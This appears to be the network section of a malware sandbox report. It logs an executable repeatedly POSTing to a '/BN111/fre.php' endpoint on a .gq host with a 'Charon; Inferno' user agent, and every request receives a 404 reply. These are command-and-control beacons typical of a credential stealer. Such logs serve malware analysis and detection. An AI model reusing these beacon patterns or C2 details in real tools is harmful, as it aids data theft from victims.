                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:29:06.302758932 CEST1142INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:29:06 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vcIT0xtrtdVqZu8AstBfvjAOVLZeU0jJkIg51LaEYzt2WcaP0aINNFdyPyzHGCi%2BFUn%2Bt9DitNetNAaC7a2WU1CkIz4esUAOdjvWe6RoWWH3jxFIhJPzOheLtuS4TLQLSt5M8LPLyDNCbhVFlEiI3yXDVeNVew%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec059aa9618e5-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      34192.168.2.649816172.67.219.10480C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:29:07.530339003 CEST1143OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:29:07.646630049 CEST1144INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:29:07 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=AsF%2F42rJeMS4o1jyaWpX5rcN1C7%2BwlYe9QyAvadZhUprUUDjjvl2mBaUHv2qSzvsM16RfVyDjciOwaQ0dYaMDLZXn9BBMNQ78ci9geDbIWxYBOq%2Ff7WlFnJZqgqdZEFqzws6tXcgPBAa0hiRMJyXMKzh%2BY5Kzw%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec0621a7342f1-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      35192.168.2.649817104.21.62.3280C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:29:08.722565889 CEST1145OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:29:08.835047960 CEST1146INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:29:08 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=AETlKv0JLdUaJlMFIYw4c%2FUS3KY3jsZfqgBBcqkQPH7kBiRqISjQcPL9%2F6EycOt8Q0b%2BrCiBpVWf2JTuaTeRvPun%2BVdjS3dtjl0255v8MUhEF3A8ouzlFjwM9m5wMuIPxpMuRcbOokOsnygMEGf%2FVwZGMBD6qw%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec0698d3268e5-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      36192.168.2.649820104.21.62.3280C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:29:09.909565926 CEST1225OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:29:10.033361912 CEST1243INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:29:10 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=erKQyQL4NJDpVARn6gPTghRshW34aWgx999kFto0hxMgvDWKpjzkg8Ub9PghJyk1Z5TjvoNbgssstoLWvM30lY7gyqwlTQwOwpeLID12mO81PbUOzRbpTH9BULjM1lW%2FOKhQiir%2FSFqgaO1xg4olF%2FOm%2FEl05Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec070fbf74e98-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      37192.168.2.649826172.67.219.10480C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:29:11.124121904 CEST1373OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:29:11.252242088 CEST1385INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:29:11 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2FYS21KNhhPKeyLYemwqTO7CJfgOLB%2BcE8nmbaXZezuXpmbCfYbooJZGrTK1I2wCAIGGXi7Mmgbbcm9cTp0SlhyncjZPkn5v4lky0Kk4tKiYowD6Fp1RjLa2jaLWKfS7dODQ0ElVEAkA4Fmys4RO0oXOblnwXng%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec0788baf7049-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      38192.168.2.649834172.67.219.10480C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:29:12.348795891 CEST1557OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:29:12.488634109 CEST1561INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:29:12 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2B2qI3uPr1SHaFu9HAlyv12q%2Fhc2IMayWd%2Bj1fcV0AkZcaVue84gdm%2F7cQrR6vLY0VY7KYJBbWGLpWPtzrfM9eaBQPFNmCRI7TpAHhLrs47U15LbrrJR0WJX9Oc%2Bk59NVPnfHDIGNV6BI%2BfF99GVheeaXjWvcKA%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec0803a323128-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      39192.168.2.649843172.67.219.10480C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:29:13.657084942 CEST1800OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:29:13.770459890 CEST1840INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:29:13 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vLfAG7fmX6CyxJzEk0O%2FBmg16SmrBE5YBS%2BRqup8BBlwc6IKUiq47jBhstgYikzkzMesviFQn6p1zW4GFv1I33WYuGftqKKV0g1GwmVoOI9dfpmoaBmAp7BfaYYlwjL6gInDoblSgql%2F6c1Q%2FtwThQC5OxPEAg%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec088686f5c38-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      4192.168.2.649783172.67.219.10480C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:28:23.792481899 CEST1062OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:28:23.945936918 CEST1063INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:28:23 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5wgGIaVyqpazjweKVSLXwiCkN75Ifsmvy1yNZb2HaTGFvj97QAK7byh9rdPZijXBS8IE2ZBG%2FYRIB4fcQZc0542rQ1bDIXwKO%2FyT7rfH3BOzsIfhWyfBIdPcSEdN3h0udKSLVpVjCxXslaXSnf%2Bcj8Aw4JtpmA%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69debf50b8e24de8-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      40192.168.2.649853172.67.219.10480C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:29:15.138021946 CEST2098OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:29:15.258631945 CEST2100INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:29:15 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vIoJjlpOUB4ch8A9vB%2FKQqgVGqG%2FBMM%2BfQzehosuEFSNQFo0gE9WIhQc2ZWAsVfi803z79IZC7COD7vw7q3ZvK9f7Lpn0xBwaC95bSAWCuYNsNId8NhJwwCkVxQHYxnxd4FRF8MJkTCEfItWcIZzhdJYp6PXZw%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec091ad1b4aaa-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      41192.168.2.649860104.21.62.3280C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:29:16.658468008 CEST2114OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:29:16.772655964 CEST2116INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:29:16 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2B6WLQ0YL6zFlWhHgnt6U6cMjNqhg5htzjtx%2FJ7jjaqAcyvmGs5vvqQFzydOJ0caWu3xNVdyUaeMy0GV8mS37gvIqcjdOZZ0esg5rlfOM%2FG%2FhL%2Bsg9F9ZhQbRtpEBXBQq5liRP8vYQAFgvHT%2FvZ5gZZtn75E7xw%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec09b293e5be5-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      42192.168.2.649863104.21.62.3280C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:29:18.009855986 CEST2121OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:29:18.129460096 CEST2122INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:29:18 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NEEHx%2BkmIT9asVndpNXR1AoGjnCHChsMAYShF5yGwYqEj%2FgJsdB0Mx0KbcltXiFP56kkMvROqu%2FHNChiSzQKeS2N34dJxa42lt0RG86mw%2F6702IFnVtlIfN7UOJyiytUwY3ivfQHS555wFEzMe%2FIT1fowiWd1w%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec0a39b634e8b-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      43192.168.2.649864104.21.62.3280C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:29:20.400475025 CEST2123OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:29:20.518090010 CEST2124INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:29:20 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4smlu4lSWaMUj8PWc%2BGpmke%2BENRvCwicQAhGufEzY4Xwa7kc3y6YhyyyYu%2BwPR0zEsPEe1hN0%2BiA2kWHr%2FJE%2BXajyLuEfTCC38E6%2FySGXkOUU0sGE9B9d2NunzFnN9Jpxmznzq%2BWLqFLCc88Y6o8kCh%2BJdWbng%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec0b28e524e5c-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      44192.168.2.649870172.67.219.10480C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:29:21.825018883 CEST2128OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:29:21.940284967 CEST2129INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:29:21 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=rzu%2FohVuhjczWDe7tSOrF0uRiMZdPJrfjpN1hISShviTn6CxquhhvYU2ZYQ2Afh3g6P1FuSAKzKR6pmpqQCL727H0cqqtCgKFYjeXiZlAHmuAv%2B5N6h1XDjgPB5X%2FZuAlzCAkAnMt54YuBWaZYpOMDRgoMijug%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec0bb69254339-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      45192.168.2.649871104.21.62.3280C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:29:23.419826031 CEST3440OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:29:23.542494059 CEST3948INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:29:23 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=PIDL4Ex4yVSKIruz6ska5ciNfQXYfiK08MG3n%2Fl5sBh3uTbHelpQ%2BjFtXJazHaCXD%2FcS9T%2FNICexg23jtCzdGJnXlzeuuDLWonv2ZPeq4lMjDt5h2txZPLlLYA9u9inYXLCUr1h1CBSjz2d%2B08xCKW78cQE3ng%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec0c56e57d6d1-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      46192.168.2.649872172.67.219.10480C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:29:27.468224049 CEST7347OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:29:27.586599112 CEST7348INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:29:27 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7ltrm6sBYZ30PkF8Z7VQJ7TUsrGZvzAnFrCkFXlgpwUKIwSLl0AKErABPq3oLlrSThb2YL8K3CEZTNit0GLpNLsiF78D%2Bo%2FeB6vJTTi3fwh0lA8bdxzosx88%2BepGYJVN9NOxQjuwGMKesX%2FSg1REiYGp8lFNnQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec0debb1b68f7-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      47192.168.2.649873104.21.62.3280C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:29:29.646629095 CEST7349OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:29:29.765604973 CEST7350INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:29:29 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=tR8YTHsFUlHBp8jLYHNxWg6PfHZ0Q9qY6Z3f00iw%2FRPkfDCJWPs2NCsHs%2BJRNc7qtmk0cQf9cr5pQNsUFXF%2BJcUJy6DqBggagu08v%2BAxRuxiMb5hoOAO2BqKdlUHQOZJ0B4Pm%2FOMKal28DTap0fJzQTMHSpwyg%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec0ec5bd44401-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      48192.168.2.649875172.67.219.10480C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:29:31.734477043 CEST7352OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:29:31.847372055 CEST7353INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:29:31 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=L2EsWzEZJKWTDEn93sKWFLzev8Sl0yir0x01b%2BkSL3ujzOb1%2BV3ppWcxuzQdjug6QJKPfPBqA70PVP6l0gcrvl1Nke8DdVo%2BNZdDAhag%2BRgxa5KekRs3f6n4KUeQs4FC1ErSaLb8kvrBEaD%2FKEum9jCbi9W6LA%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec0f9584568fe-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      49192.168.2.649876172.67.219.10480C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:29:33.006582975 CEST7811OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:29:33.126630068 CEST7812INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:29:33 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Wa5i4pYc47XTZTSRKuePuJGDKfzroVXSpP4vHBUDcpsntok8NHAncV7jpTLBPs6CkrH8kUIW9ytBz2JwxWNyMqJw1jmWzD%2Fy1Bnna2df9JCgcS%2Fw7JdgzCjsdEOd%2BbuV0ccxxBXnyytwG6K3l%2FcIIvtKwmy4fQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
